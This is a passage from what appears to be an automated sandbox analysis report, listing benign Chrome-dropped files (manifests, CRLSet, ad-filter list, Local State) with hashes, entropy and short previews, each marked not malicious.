                                                                                                                                                                                                                            Preview:.q..............*...C.:.\.P.R.O.G.R.A.~.1.\.M.I.C.R.O.S.~.1.\.O.f.f.i.c.e.1.6.\.G.R.O.O.V.E.E.X...D.L.L..P!...[)...%.p.r.o.g.r.a.m.f.i.l.e.s.%.\.m.i.c.r.o.s.o.f.t. .o.f.f.i.c.e.\.o.f.f.i.c.e.1.6.\.......g.r.o.o.v.e.e.x...d.l.l.....M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .2.0.1.6...*...M.i.c.r.o.s.o.f.t. .O.n.e.D.r.i.v.e. .f.o.r. .B.u.s.i.n.e.s.s. .E.x.t.e.n.s.i.o.n.s.....1.6...0...4.7.1.1...1.0.0.0.....*...C.:.\.P.R.O.G.R.A.~.1.\.M.I.C.R.O.S.~.1.\.O.f.f.i.c.e.1.6.\.G.R.O.O.V.E.E.X...D.L.L.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...#\8.D...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.C.o.m.m.o.n. .F.i.l.e.s.\.M.i.c.r.o.s.o.f.t. .S.h.a.r.e.d.\.O.F.F.I.C.E.1.6.\.m.s.o.s.h.e.x.t...d.l.l..@.....U/...%.c.o.m.m.o.n.p.r.o.g.r.a.m.f.i.l.e.s.%.\.m.i.c.r.o.s.o.f.t. .s.h.a.r.e.d.\.o.f.f.i.c.e.1.6.\.......m.s.o.s.h.e.x.t...d.l.l.....M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.)...M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .S.h.e.l.l. .E.x.t.e.n.s.i.o.n. .H.a.n.d.l.e.r.s.......1.6...0...4.2.6.6...1.0.0.1.....D...C.:.\.P.r.o.g.r.a.m.
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):407471
                                                                                                                                                                                                                            Entropy (8bit):6.047009069732878
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6144:jRpCqeldMW29TlMJYbG0OP1eVxR+v+F7EFpfY4XB3iE7ZPXYGzLxinQ:/sdB2DKYbGNPUZ+w7wJHyEtAWp
                                                                                                                                                                                                                            MD5:80F1B9145F63D2202D8A3C4004B4FD3B
                                                                                                                                                                                                                            SHA1:62D5EF6B9E910357E662A59160DA8C18B94DB908
                                                                                                                                                                                                                            SHA-256:0FE85EDC2C2FEBE1633E21C5E07CA386EBD208BAD3C229A10C2F77B6C61605A8
                                                                                                                                                                                                                            SHA-512:C004DBBA54ED683970D745A541C08F284823E5FEDA9367F7BF13A7A639C8122D97F3A18AABF844F1AEBA5B720F96180ABAF5CD16DF1779119F62EB8206CC7D3D
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:{"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.652500003100843e+12,"network":1.652467604e+12,"ticks":267058633.0,"uncertainty":3801552.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAACMBYze0bKMTIhZGR/AW4M5AAAAAAIAAAAAABBmAAAAAQAAIAAAACoSPhbyumSaNjLuAHEna2OUDn+rpXOk+H/ONjHe5ZwbAAAAAA6AAAAAAgAAIAAAADezR1ii2QiPYGPz0Jd0ZQiE5jKOKMttbbwwADHJYDpEMAAAACuIP4EJtfud3aEFZzvijkFSTP1RNwcy8fFg19xXfiV1Q9wriZb5iS+jYbOXKVX44kAAAAByJv8rXU2wt9ZoSemiGl7Rv1MeHwgrJRvbYcUfMpjLAz2bh77nWHOppVpZzR2K2uw89vs6aWrPXuiWeIEQQvEM"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245952488007586"},"plugins":{"metadata":{"adobe-flash-player":{"disp
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1425
                                                                                                                                                                                                                            Entropy (8bit):5.994801846608462
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24:pZRj/flTm6M27DJGpqYdIQpFpNSzkaoXgdF/bhndPeQUAXFr9oX4OvDFryBuliPO:p/hZ7DJI1fp/Nykak0/FdPe2p9kdBms7
                                                                                                                                                                                                                            MD5:A9213F8CDFB6B78022DA05CFA5A7D891
                                                                                                                                                                                                                            SHA1:93D3EF815A109379A001E3F3202757F3203361B9
                                                                                                                                                                                                                            SHA-256:9C668E3D077EEE7AEF97863D7FE1CBF61FB4B5000453F505703E57D27B422967
                                                                                                                                                                                                                            SHA-512:6C7BE485C63EA72AF9E427ABE509A30BE13F4BDE09F0CDB8556CFF13B083B715F7F5DFCE57A1E768EF1EB88F04EFD4E99C226100191B93F75469418CE330CE69
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiJkb3dubG9hZF9maWxlX3R5cGVzLnBiIiwicm9vdF9oYXNoIjoiakhYVTVVRE1oWUx1VUlROV96d1Bsd2Zmd29uTkhSbURmaUE5VUFHaVEtZyJ9LHsicGF0aCI6Im1hbmlmZXN0Lmpzb24iLCJyb290X2hhc2giOiJJNTVkQUc3d3BDSWJBTmNzSkRZWmp0cDJCRHFTUkZXdzNwdE9sU2ktek5zIn1dLCJmb3JtYXQiOiJ0cmVlaGFzaCIsImhhc2hfYmxvY2tfc2l6ZSI6NDA5Nn1dLCJpdGVtX2lkIjoia2hhb2llYm5ka29qbG1wcGVlbWpoYnBiYW5kaWxqcGUiLCJpdGVtX3ZlcnNpb24iOiI1MCIsInByb3RvY29sX3ZlcnNpb24iOjF9","signatures":[{"header":{"kid":"publisher"},"protected":"eyJhbGciOiJSUzI1NiJ9","signature":"LqYqsP-WlB8nE2JEqYRQxkHwN9Wgu2MK5D_uPKB4atX30fFzDZAv8Z9plvsI53AMo_GMmNgC8lY-_9pCOQ1F19ExfbP5FC7NcA3xe112MMEg7Fkb58kGoMuTn-NQmI-ZrdwwRnGsT8tuLR9EVd9GtzapIXldJbnhF3jZdUAR_fDG03RTaF2BmeDK2OHFmFhjGgyaqgwW8jBASkQEYpW4czHJUk45TmANmcW3tICwSoTzoTZvPOQ791WdBp6OISU0KeojQjs0W7Y6e90Do6sOIVBKprbt0RqbKUIAC1WA3t7b2E0rMwXGmIRTjhSMkaflwMh4gFw54E5PLQMxIhNCBw"},
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):7650
                                                                                                                                                                                                                            Entropy (8bit):5.12483814381491
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:192:40aEW8SsWk/pvtHB3Nf5Y10k6QKEa4pmigb1BPxzO6RsO6v:40aEW8SsWk/pvtHB3Nf5YKk6QKEa4pmA
                                                                                                                                                                                                                            MD5:8D7D8483804246771B62D74531D9C7A8
                                                                                                                                                                                                                            SHA1:19EA42E79F04F4C2A1CCAA637385BC7EF7EA19F3
                                                                                                                                                                                                                            SHA-256:A28B662C9E379BAAD00E700A9AA4124A2D7A3648669EB88C8E8F8CE1A7011A85
                                                                                                                                                                                                                            SHA-512:955B2B467063D774233C0B5DDF0FAA04678224855E7950967B1EDE83103FF14EC8371F1B36CE7D92F9B11D2BA6AF10DE732CEE990C7500EDEC7C71252890A667
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:.2...#<....jpg... .*.........jpeg... .*.........mp3... .*.........mp4... .*.........png... .*.........csv... .*.........ica... .*.........gif... .*.........txt... .*.........package... .*.........tif... .*.........webp... .*.........mkv... .*.........wav... .*.........mov... .*.........avif... .*.........swf.D .*.........spl.E .*.........crx.. .*.........001..... .*.........7z.4.. .*.........ace..... .*.........arc..... .*.........arj.:.. .*.........b64..... .*.........balz..... .*.........bhx..... .*.........bin..... .*.....0.....bz..... .*.........bz2.8.. .*.........bzip2..... .*.........cab.... .*.........cpio.@.. .*.........fat..... .*.........gz.6.. .*.........gzip..... .*.........hfs..... .*.........hqx..... .*.........iso..... .*.....0.....lha.<.. .*.........lpaq1..... .*.........lpaq5..... .*.........lpaq8..... .*.........lzh.;.. .*.........lzma.?.. .*.........mim..... .*.........ntfs..... .*.........paq8f..... .*.........paq8jd..... .*.........paq8l..... .*.........paq8o.....
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):66
                                                                                                                                                                                                                            Entropy (8bit):3.8793357407284366
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:SXGVNXEWfw9CSedSVzQGDB7YsDAwd:SUNX/sQkD/
                                                                                                                                                                                                                            MD5:A13AE9794CF91F69B4E285B2F5E2FFDD
                                                                                                                                                                                                                            SHA1:2A9E7B1BC57B296D792B50E03D80D21A9B8731F2
                                                                                                                                                                                                                            SHA-256:D68B68CF7C55432F41582B26536C9FD9A3BE50DD6E3255D4EC1B79488CA15C96
                                                                                                                                                                                                                            SHA-512:0FD65CDB977949DA94E694CA018CCE97E4995389F4E29F9ED791B418938D9813CE1F13606363A67407BA26414E9A32757FB181FA5EB4E663BDF0F4DD8A2BEDF6
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:1.2c15227a2823f31c7f3728e85a39bd87040d30562f3fa8d1c6faeb20f93e3cc8
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):173
                                                                                                                                                                                                                            Entropy (8bit):4.479129266715852
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:rR6TAulhFphifFRxJ1KnOFgS1iJHpEeSWU4pv/8F/FxLj2RF2fcTZTotL:F6VlMDf1KqgS1qOWfB0NpK4aotL
                                                                                                                                                                                                                            MD5:6919207CEDCD450B8080CEE781C19AC8
                                                                                                                                                                                                                            SHA1:D57E8CEA888A3B1457D98A3CD5E6038D090462F5
                                                                                                                                                                                                                            SHA-256:239E5D006EF0A4221B00D72C2436198EDA76043A924455B0DE9B4E9528BECCDB
                                                                                                                                                                                                                            SHA-512:FF864721CE59CA633FAE8D8E3D4728952F6FCF0B241DEF7832F22EF229699282A588FD76B91A3E4FA7B470CAFA9E41E8460977C2A1547A5A9E9D3CF5E8D4AFF0
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:{. "manifest_version": 2,. "name": "fileTypePolicies",. "version": "50",. "imageName": "image.squash",. "squash": true,. "fsType": "squashfs",. "isRemovable": false.}
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1311
                                                                                                                                                                                                                            Entropy (8bit):6.005142745622942
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24:pZRj/flTDyV9yVmddLb7aoX6wcIWQ4vDzRS9KF6oXZEWGPnIQvo+M:p/haEAdV7ak63Rx0KF6keWiI6o+M
                                                                                                                                                                                                                            MD5:015CC8BEA4A6A775AF3080882F5D9455
                                                                                                                                                                                                                            SHA1:E3728A7B6A32044FDACE9F7FC447997FDE32FB18
                                                                                                                                                                                                                            SHA-256:DCD27659E8C9BE4F9130B1CAA328162D305544D9799EF0A0675085A962CF7578
                                                                                                                                                                                                                            SHA-512:F6C8FEC2DEB717F361E77117F6FEABBF9B26EACE7402957D7D312F334A82176AD44DAC1A4124AF004C7CA6F3F6B73124740289B9570A85354DB3C1047751F237
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiJtYW5pZmVzdC5qc29uIiwicm9vdF9oYXNoIjoiZWJkaGhpRGxDcEhFOUc5RllLMEZTQ1B4RmFBOXBWMVdVYzdPaUVPSlpZSSJ9XSwiZm9ybWF0IjoidHJlZWhhc2giLCJoYXNoX2Jsb2NrX3NpemUiOjQwOTZ9XSwiaXRlbV9pZCI6Imxsa2dqZmZjZHBmZm1oaWFrbWZjZGNibG9oY2NwZm1vIiwiaXRlbV92ZXJzaW9uIjoiMS4wLjAuMTMiLCJwcm90b2NvbF92ZXJzaW9uIjoxfQ","signatures":[{"header":{"kid":"publisher"},"protected":"eyJhbGciOiJSUzI1NiJ9","signature":"YQ3bA-EV7C3PaG_SnIbfTSwU1AwZtGpsZ6QFPw-_VbUhBWySX2efppu8GX0fliZRHW6KEP7fjynCV_qNtcgrpl8BjSO-1nmB1KrigfT4kHv6uBh8h_SXujgGRjIPAXCWPLYKco-hqE9tTuQPKmzn_-Zc9GgJpl5lEAsu6UTzjrvVmzKkgkbdcesMNSwbrvyDffx2nikl2p_7U3IkHNyd7hLpsCvZV8VqwCHwC6pOuggw5kmNjLwxmRnjA_Emy9mMXEUEofyh7EEOs9BaUNsokg7qXuxkrMz4S0ja5VB6ZVmBO5Wlvexk3EXD-yDCykgMDxk2WZGpW1JtkYnpOMqgGQ"},{"header":{"kid":"webstore"},"protected":"eyJhbGciOiJSUzI1NiJ9","signature":"W9LRESuiylidkd-XDuFWN18wHXTE2O2h4LMHy
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):66
                                                                                                                                                                                                                            Entropy (8bit):3.947126840193127
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:SuOcV6oDkEoVavUd1iSiXn:SBCDk5svU6SiX
                                                                                                                                                                                                                            MD5:072D0D7C824A2889BEB0B9CEF0FD2197
                                                                                                                                                                                                                            SHA1:985C0EC750CFFBBAE6B2F079E77149E434E9D517
                                                                                                                                                                                                                            SHA-256:BF69E3FA772C505E6E75E2A5086FF0396248246F319024745B80FC0FB39D93E7
                                                                                                                                                                                                                            SHA-512:A397B48EE93B964A38501846F876ABF2C29AF2150786DCF6E37BAA0EADF48DEE2F8601953F8AB7D4AD76CB5586D669CB1F11FF5A8FDE5B638F0B91413B358C03
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:1.ab8d70a60ce0fba1355fad4edab88fd4d1bccc566b230998180183d1d776992b
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):300
                                                                                                                                                                                                                            Entropy (8bit):4.716626192856269
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6:zeXC6WQpVyTJCAEIfd26VO9bIA6VDHs/C6wrhKXk7Vm01LwyAGI/zqSkhY:0eTJCAEQLO9hQADgK0711LqGika
                                                                                                                                                                                                                            MD5:9569E205D5815A3D9E14DEE93B7717C3
                                                                                                                                                                                                                            SHA1:020BD6A07EF64A304B07E3ADFDA4C4D5397534CD
                                                                                                                                                                                                                            SHA-256:79B7618620E50A91C4F46F4560AD054823F115A03DA55D5651CECE8843896582
                                                                                                                                                                                                                            SHA-512:BE5EB17E769203E6A064326F227D21FFC1E8AA3F2684BD9786FAA4D0EAC944E4343608B1AEA25FDA15FFF88D9C41487907037FEF75DC4D1615A27C7041FC0F9C
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:{. "description" : "Origin Trials public key updates and disabled features list",. "manifest_version" : 2,. "minimum_chrome_version" : "55",. "name" : "Origin Trials Updates",. "origin-trials" : null,. "update_url" : "https://clients2.google.com/service/update2/crx",. "version" : "1.0.0.13".}
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1558
                                                                                                                                                                                                                            Entropy (8bit):5.11458514637545
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:48:OBOCrYJ4rYJVwUCLHDy43HV713XEyMmZ3teTHn:LCrYJ4rYJVwUCHZ3Z13XtdUTH
                                                                                                                                                                                                                            MD5:EE002CB9E51BB8DFA89640A406A1090A
                                                                                                                                                                                                                            SHA1:49EE3AD535947D8821FFDEB67FFC9BC37D1EBBB2
                                                                                                                                                                                                                            SHA-256:3DBD2C90050B652D63656481C3E5871C52261575292DB77D4EA63419F187A55B
                                                                                                                                                                                                                            SHA-512:D1FDCC436B8CA8C68D4DC7077F84F803A535BF2CE31D9EB5D0C466B62D6567B2C59974995060403ED757E92245DB07E70C6BDDBF1C3519FED300CC5B9BF9177C
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:// Copyright 2015 The Chromium Authors. All rights reserved..//.// Redistribution and use in source and binary forms, with or without.// modification, are permitted provided that the following conditions are.// met:.//.// * Redistributions of source code must retain the above copyright.// notice, this list of conditions and the following disclaimer..// * Redistributions in binary form must reproduce the above.// copyright notice, this list of conditions and the following disclaimer.// in the documentation and/or other materials provided with the.// distribution..// * Neither the name of Google Inc. nor the names of its.// contributors may be used to endorse or promote products derived from.// this software without specific prior written permission..//.// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS.// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT.// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR.// A PARTICULAR
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1511
                                                                                                                                                                                                                            Entropy (8bit):5.966986118893252
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24:pZRj/flTU3YiIGGvpvMjoYZU7aoXsx54IGOK/8yoXZnn7EJ1ZGY44+A0Kr5YoN:p/hUIBxN7ak0FGOc8ykNn7W1ZGf3ApY+
                                                                                                                                                                                                                            MD5:0A9DE6B812FBB9ADC86CBEB416EF46D2
                                                                                                                                                                                                                            SHA1:A58AE7728CB5D268C650FE12E75EA1389355950D
                                                                                                                                                                                                                            SHA-256:74D60FEA129B562B39DF88D7B0EB148066B643D4613EB9DC19AC844F66D3687E
                                                                                                                                                                                                                            SHA-512:E9ECE139DC302F8EE72BB9ECC0C76676E53E6CE8431543A957CEA1E9EE1B62CF7218D24A06FACDCD24B41AA2BB5B150F2F8F708863841E76C4D33F9F38E6ED53
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiJMSUNFTlNFIiwicm9vdF9oYXNoIjoiUGIwc2tBVUxaUzFqWldTQnctV0hIRkltRlhVcExiZDlUcVkwR2ZHSHBWcyJ9LHsicGF0aCI6ImNybC1zZXQiLCJyb290X2hhc2giOiJxTU9Rdl90TkxRQmFLbWdwQmVieUtnT2VUSmJpSUJlMU1Vd1owUmRUYWowIn0seyJwYXRoIjoibWFuaWZlc3QuanNvbiIsInJvb3RfaGFzaCI6IklqdzVtRjNoSWdzMkdVWXlBcXM0TU9QTkdJTVppS2ppc0lfRU1jZVZoTkEifV0sImZvcm1hdCI6InRyZWVoYXNoIiwiaGFzaF9ibG9ja19zaXplIjo0MDk2fV0sIml0ZW1faWQiOiJoZm5rcGltbGhoZ2llYWRkZ2ZlbWpob2ZtZmJsbW5pYiIsIml0ZW1fdmVyc2lvbiI6IjczMzQiLCJwcm90b2NvbF92ZXJzaW9uIjoxfQ","signatures":[{"header":{"kid":"publisher"},"protected":"eyJhbGciOiJSUzI1NiJ9","signature":"VWQIz-_z-bo_zrs4707UfJnx8Fa5aAq0MiBU4yeHcQO6ezXMjifNQjbIHmMs-1bnzlOTcBXLvT7mVD1umc_69GMIKmUfaJPKYOBhJxE4l6fNrQh0t-pQe3bquQ9k7R6LCWiylN1YIjabhGHlNna6kFaY1sbmYUM7QfUqZ-g3XdmJj7UtDxrzDSfsBwhHWlYUI1xsRqsubVtJCrv_KJGICOWKs3vsLfyNo1hBHa9jAfiktqwb5IaQQ5Vt84GrHGSySQL
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):22137
                                                                                                                                                                                                                            Entropy (8bit):7.832339454934655
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:384:826XPK5MeWUUMWVPplc4m8eWDztoBos11g5fk8QzsvF5trdG9htt/8tPJBr:8fH04VBlJYWntox11yk8SgXrdG/OP
                                                                                                                                                                                                                            MD5:9D2F2267B0879A1331D54FCC7CCD71EF
                                                                                                                                                                                                                            SHA1:2966F5E040A23855AEC78CAD8E4915D866F667B6
                                                                                                                                                                                                                            SHA-256:5B7ED81CABCE43CEDE1388ACF6D19C93F9E6390ECD085E5143390E984B59B762
                                                                                                                                                                                                                            SHA-512:B438E0EB5F6026F8B562BCC64B211FFA50E2F7590D56B8A2E5FD3B8AFD58B69A8AD2A9EA750CBC28675C8A48C5FEEC63B57180520A2BDF726ACEBD534BEC0837
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:".{"Version":0,"ContentType":"CRLSet","Sequence":7334,"DeltaFrom":0,"NumParents":189,"BlockedSPKIs":["Jdoa1Yu/z7In2HI7GFfUwY57qnQXtPnv+TZrXoafizk=","li5LVLuYp+5dX+uWM/mR08MwDpUU2t57DU+CjHlPjoc=","yP3cdcsb27WMB7TqhHKH9iZlndZrwQomrdm1dbOgo40=","BN3pqpp59hSYaCMl+ghwJ2cH+5ypU4QSC0aJMmhJT8k=","tbqN1/iVZMKInT1kU8hJmMd4JJGbZOoINapimGWRvlA=","wO0gU0a7veButWD1zuAqNjTiR0p+ds+PvvVjuxF90OM=","eBpM8ukkUvPuAdDDgaQhTzkEFlw5CtvWH80RJE4Jstw=","/NdsyiNH5c1bOTR/Uc9DZUtpor/JBzZwpr5H2HAebg4=","lo26afv/Fb83YgiUMa3lp+rUt+rxvnACaBC8V9HGT24=","fNKVt1VEgIq9lAlGbwg3xarcAuM7YVDGZE3goJZZ8jw=","9Sk9R+041MMbLULe47WzrOl8omyirANl42Iu6AITH7s=","nFmjzK6kaZhCsGjPxSz5RdtRmGlXyDLNsYynOEn7ue4=","OUz/WJ5okxLPwHHuC8Gf5MYGIWzlQ0Kd5tti5C27O8E=","NuqWEoyJg5+2IfitDh7gucIgb2Kre02ixnZYk8m3ztI=","pqyh7JgJzFtIIf+dKcXr5lGWC5Gx8ZzIm1Xvh4GKlQk=","MO/kE4JHbDOA8C9+I+ZrovhnsFnuHqaHlrRBuFtdElY=","r1kVGOLmxg67/AkHr6pJvEBR1F5/IUq/7nUS7gD2Ye0=","6EnHF2yT32X2S2FpgjZuVmMReBK2+ivAyPqK6u5Bgcw=","0x7DkoW3pTGdAVfbQg7YfHQ+Mzu8d/h3H3BGT0NqYEk=","h7/Yr
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):66
                                                                                                                                                                                                                            Entropy (8bit):3.89493224264682
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:SXDW3m3cWFQUXiS9WHEOXdmEA7m:S9+USS9AXdE7m
                                                                                                                                                                                                                            MD5:44CE6E94741F658DA6943B651C954B3C
                                                                                                                                                                                                                            SHA1:F45293BD26F25F7579F8C82D0D4F15D9364375B9
                                                                                                                                                                                                                            SHA-256:9524C4BB707055DD2D7F6BCC2946FABBBE9C65D92FCB8F77990457D9F0EE774F
                                                                                                                                                                                                                            SHA-512:D77631F70482315B206204B3C4104CA5F0CB396D47929FFA97CC2AD17D221B24CFA1E1346648AAED9AC7BE7AF97BF45E65C92925091A9E2EA12BF223AF4CCBB7
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:1.23e74e3a10ef9ca4be943d2623b12747e65aa30cc2baad621a50e2197af94870
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):192
                                                                                                                                                                                                                            Entropy (8bit):4.825852116718429
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:rR6TAulhFphifFJWgXrZ4uhFgS1EFFHJEeSWU4pv/8F/FxLj2RF2fcTZTotL:F6VlMu4IS1EFcWfB0NpK4aotL
                                                                                                                                                                                                                            MD5:21D38F12F65F8D51795BB04EFB9E9517
                                                                                                                                                                                                                            SHA1:8C8AFB8003C532F460360FECD88FA26EDBE23B7A
                                                                                                                                                                                                                            SHA-256:223C39985DE1220B3619463202AB3830E3CD18831988A8E2B08FC431C79584D0
                                                                                                                                                                                                                            SHA-512:A7212CCEFA410B1A5BAD597BC8FAD39171920EF7C265DBF03B7C96FF654B1C767647AF646AB96DCA42A3A92F7B6DD1E469C0506AA876859965F07AF9D6CC0DB8
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:{. "manifest_version": 2,. "name": "crl-set-17509195642807481819.data",. "version": "7334",. "imageName": "image.squash",. "squash": true,. "fsType": "squashfs",. "isRemovable": false.}
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):96166
                                                                                                                                                                                                                            Entropy (8bit):5.4897674246314825
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:1536:F3eywFManDiYhqzOBD/mpEV+SYkdD0No8grXyT00LschZ0J5b5wDj:LwFManGeAOBDwEfRD0NTCCT00fhZ0JxM
                                                                                                                                                                                                                            MD5:81BE5836F8740802C2CD3436AF0D326C
                                                                                                                                                                                                                            SHA1:88BD294563A3E1BA663375609E83DFED3B57E6FE
                                                                                                                                                                                                                            SHA-256:409C37FBE8373412615BBDE198F234BCACFE8BB32DA179B1F84B003EB558488F
                                                                                                                                                                                                                            SHA-512:4EC450888C8C0505B7AD517891AD158153CF2E93A0A32A670D5709B8C74DA3BF0D30EE59F35F9D529FE033E7771FA8B28B9EB06204E732F0308BC4C073E6ABFC
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:............0.8.@.R.-728x90...........0.8.@.R.adtdp.com^..........0.8.@.R.rvpsrv.com^..........0.8.@.R.yomeno.xyz^.:........*...adcore.com.au..*...adcore.ch..0.8.@.R./adcore_..........0.8.@.R.uwoaptee.com^.8......*...safeway.com0.8.@.R.fwcdn2.com/js/embed-feed.js..........0.8.@.R._468_60..3........0.8.@.R#/wp-content/plugins/wp-super-popup/.9........0.8.@.R)bancodevenezuela.com/imagenes/publicidad/..........0.8.@.R..adbutler-..........0.8.@.R.adrecover.com^..........0.8.@.R.hdbcode.com^.?........*...google.com0.8.@.R!developers.google.com/google-ads/.-........*...konograma.com..0.8.@.R./adserver...........*...vk.com0.8.@.R.vk.me/css/al/ads.css.,........0.8.@.R.mysmth.net/nForum/*/ADAgent_..........0.8.@.R.indoleads.com^.%......0.8.@.R.discordapp.com/banners/.E........*...daum.net0.8.@.R)daumcdn.net/adfit/static/ad-native.min.js.(........0.8.@.R.looker.com/api/internal/.#........0.8.@.R.broadstreetads.com^..........0.8.@.R./banner.cgi?...........*...thefreedictionary.com*...downloads.co
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):24623
                                                                                                                                                                                                                            Entropy (8bit):4.588307081140814
                                                                                                                                                                                                                            Encrypted:false
